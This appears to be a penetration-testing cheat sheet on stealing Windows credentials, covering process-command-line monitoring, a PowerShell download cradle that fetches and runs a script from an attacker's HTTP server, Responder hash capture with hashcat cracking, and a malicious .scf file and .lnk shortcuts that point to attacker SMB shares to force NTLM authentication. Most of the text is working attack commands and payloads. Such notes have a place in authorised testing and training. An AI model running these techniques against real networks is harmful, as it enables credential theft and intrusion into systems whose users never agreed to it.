See Relay Potato too
Monitor processes#
Windows have a lot of options to pass credential straight into command line
Make this powershell script, procmon.ps1, then either executes it
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}Or we can also use web cradle. The script is on our attacker machine, so we open a http server
python3 -m http.server 80IEX (iwr 'http://10.10.14.44/procmon.ps1')File share#
We can place malicious files on file share, then wait for anyone to browse through there, or click on them. This will make a call back to our smb server, and we get
netNTLMv2hash to crack
SMB scf file upload#
Doesn’t work after Windows Server 2019
Start a responder listener on current network interface
sudo responder -I tun0
hashcat’s mode fornetNTLMv2is 5600
Upload @Report.scf onto the target’s SMB. Whoever access the folder you uploaded @Report.scf to will be hit. The ip here is attacker’s ip
[Shell]
Command=2
IconFile=\\10.10.14.17\share\test.ico
[Taskbar]
Command=ToggleDesktopSMB lnk file upload#
lnkbomb#
git clone https://github.com/dievus/lnkbomb.git
cd lnkbomb
python -m venv .venv
source .venv/bin/activate
pip install -r ./requirements.txt-t for target IP, -a for attacker IP, -n for netbios name of target machine.
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windowsPowershell way (annoying)#
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()